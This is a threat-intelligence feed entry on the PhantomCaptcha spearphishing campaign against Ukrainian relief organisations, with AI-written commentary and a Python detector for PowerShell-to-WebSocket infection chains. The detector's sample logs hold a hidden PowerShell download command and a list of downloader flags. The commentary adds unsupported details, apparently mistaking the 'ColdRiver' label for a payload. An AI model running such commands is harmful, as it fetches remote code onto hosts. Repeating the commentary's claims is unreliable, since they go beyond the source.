PhantomCaptcha: Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation

NetmanageIT OpenCTI - opencti.netmanageit.com

SUMMARY:

A coordinated spearphishing campaign targeted NGOs and Ukrainian government administrations involved in war relief efforts. The attack used emails impersonating the Ukrainian President's Office with weaponized PDFs, employing a fake Cloudflare captcha page to execute malware. The final payload was a WebSocket RAT enabling remote command execution and data exfiltration. Despite six months of preparation, the attackers' infrastructure was only active for one day, indicating sophisticated planning and operational security. An additional mobile attack vector was discovered, using fake applications to collect data from Android devices. The campaign demonstrated extensive operational planning, compartmentalized infrastructure, and deliberate exposure control.

OPENCTI LABELS:

powershell, ukraine, android, spearphishing, captcha, ngos, coldriver, websocket rat


AI COMMENTARY:

1. Introduction to the PhantomCaptcha Spearphishing Campaign

In early operations against Ukraine, a sophisticated threat actor launched PhantomCaptcha, a single-day spearphishing operation that specifically targeted non-governmental organizations and government administrations engaged in war relief efforts. The campaign's name reflects its use of a counterfeit Cloudflare captcha mechanism, which was central to the infection chain. Researchers identified this activity after observing tailored emails impersonating the Ukrainian President's Office, an approach that leveraged trust and urgency to entice recipients into interacting with weaponized content.

2. Deceptive Emails and Weaponized PDFs

The spearphishing emails arrived with compelling subject lines that appeared legitimate and urgent to NGO employees and officials. Embedded within these messages was a malicious PDF attachment that exploited common document vulnerabilities. Upon opening the file, victims were prompted to complete what looked like a routine captcha verification, yet this step actually triggered a hidden PowerShell downloader. By combining a multi-layered PDF exploit with decoy content, the attackers kept the initial stages of the campaign covert until payload deployment began.

3. Fake Cloudflare Captcha and Multi-Stage Payload Deployment

After opening the PDF, victims were redirected to a faux Cloudflare captcha page, which in reality hosted additional malicious scripts. The Cloudflare-themed verification page let the adversaries disguise their infrastructure as a trusted content delivery network. Once the fake captcha step was completed, a series of PowerShell commands executed to fetch a second-stage component referred to in threat intelligence as ColdRiver. This modular approach supported ongoing communication with a command and control server reachable over WebSocket, enabling the dynamic retrieval of further instructions and secondary payloads in real time.

4. WebSocket RAT Capabilities and Data Exfiltration

The final payload was a custom WebSocket RAT designed to establish a two-way communication channel with the attackers. This remote access Trojan allowed threat actors to execute commands, capture screenshots, harvest credentials, and exfiltrate sensitive data. The WebSocket protocol provided stealthy and persistent connectivity that blended into legitimate traffic. By using it, the adversaries maintained control over compromised hosts while evading detection by conventional network monitoring tools.

5. Android-Based Mobile Attack Vector

In parallel with the desktop-focused operations, researchers uncovered an Android mobile component. Fake applications mimicking well-known utilities were distributed through phishing lures. When installed, these malicious apps collected device metadata, contact lists, call logs, and location data before transmitting the aggregated information back to the same WebSocket infrastructure. This dual-platform strategy broadened the attackers' intelligence-gathering capabilities and underscored their attention to comprehensive reconnaissance against key personnel involved in the war relief efforts.

6. Operational Sophistication and Infrastructure Management

Analysis of the infrastructure revealed six months of careful preparation, including the registration of domain names, configuration of hosting environments, and development of custom payloads. Remarkably, the entire C2 framework was active for only a single day, minimizing the attack surface and reducing the likelihood of takedown or exposure. By compartmentalizing each stage across different servers and employing strict exposure control measures, the adversaries demonstrated advanced operational security and planning that can serve as a template for future threat actors.

7. Recommendations for Detection and Mitigation

Organizations should enhance email filtering to identify and quarantine messages impersonating trusted institutions, particularly for users handling sensitive war relief and NGO communications. Deploying behavioral analysis tools that monitor anomalous PowerShell executions and WebSocket connections can help detect multi-stage payloads like ColdRiver. Mobile device management solutions should enforce application whitelisting to prevent unauthorized Android installations. Regular user awareness training is crucial to teach staff how to recognize deceptively branded captchas and PDF exploits. Finally, establishing an incident response playbook tailored to spearphishing and WebSocket-based RAT scenarios will bolster organizational resilience against similar future campaigns.
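An added example (not from the report, NetmanageIT or the researchers) of the behavioural check the recommendations describe: it scores constructed process-creation and proxy log records for PowerShell launched by a document handler with downloader-style flags, and for WebSocket upgrades originating from PowerShell, rating a host higher when both stages of the chain appear on it. The log shape, host names and domains are assumptions constructed for the example.

```python
import json

# Constructed sample telemetry (assumption, not from the report): process-creation
# and web-proxy events in a simplified JSON-lines shape, one event per line.
SAMPLE_EVENTS = r"""
{"type":"process","host":"ws1","parent":"AcroRd32.exe","image":"powershell.exe","cmdline":"powershell -w hidden -nop -ep bypass -c iwr https://verify-example.invalid/s"}
{"type":"process","host":"ws2","parent":"explorer.exe","image":"powershell.exe","cmdline":"powershell -File C:\\scripts\\backup.ps1"}
{"type":"proxy","host":"ws1","process":"powershell.exe","dest":"verify-example.invalid","port":443,"upgrade":"websocket"}
{"type":"proxy","host":"ws3","process":"chrome.exe","dest":"chat.example.invalid","port":443,"upgrade":"websocket"}
{"type":"proxy","host":"ws4","process":"powershell.exe","dest":"relay.example.invalid","port":443,"upgrade":"websocket"}
"""

# Parents that should not normally launch PowerShell: PDF readers, browsers, Office.
DOCUMENT_HANDLERS = {"acrord32.exe", "foxitreader.exe", "msedge.exe", "chrome.exe", "firefox.exe", "winword.exe"}
# Command-line fragments typical of hidden downloaders (lower-case substring match).
SUSPICIOUS_FLAGS = ("-w hidden", "-windowstyle hidden", "-enc", "-nop", "-ep bypass", "iwr ", "invoke-webrequest", "downloadstring")

def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]

def score_process(ev):
    """Reasons a process-creation event looks like the PowerShell downloader stage."""
    reasons = []
    if ev["image"].lower() != "powershell.exe":
        return reasons
    if ev["parent"].lower() in DOCUMENT_HANDLERS:
        reasons.append(f"powershell spawned by document handler {ev['parent']}")
    hits = [f.strip() for f in SUSPICIOUS_FLAGS if f in ev["cmdline"].lower()]
    if hits:
        reasons.append("suspicious powershell flags: " + ", ".join(hits))
    return reasons

def score_proxy(ev):
    """Reasons a proxy event looks like the WebSocket C2 stage."""
    if ev["process"].lower() == "powershell.exe" and ev.get("upgrade", "").lower() == "websocket":
        return [f"websocket upgrade from powershell to {ev['dest']}:{ev['port']}"]
    return []

def detect(events):
    """Group reasons per host; both stages on one host rate high, a single stage medium."""
    per_host = {}
    for ev in events:
        reasons = score_process(ev) if ev["type"] == "process" else score_proxy(ev)
        if reasons:
            entry = per_host.setdefault(ev["host"], {"stages": set(), "reasons": []})
            entry["stages"].add(ev["type"])
            entry["reasons"].extend(reasons)
    return {host: {"severity": "high" if len(e["stages"]) == 2 else "medium",
                   "reasons": e["reasons"]} for host, e in per_host.items()}
```

Running `detect(parse_events(SAMPLE_EVENTS))` flags ws1 as high (PowerShell from a PDF reader plus a WebSocket upgrade from PowerShell) and ws4 as medium, while the browser's own WebSocket traffic on ws3 and the scheduled script on ws2 are left alone.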

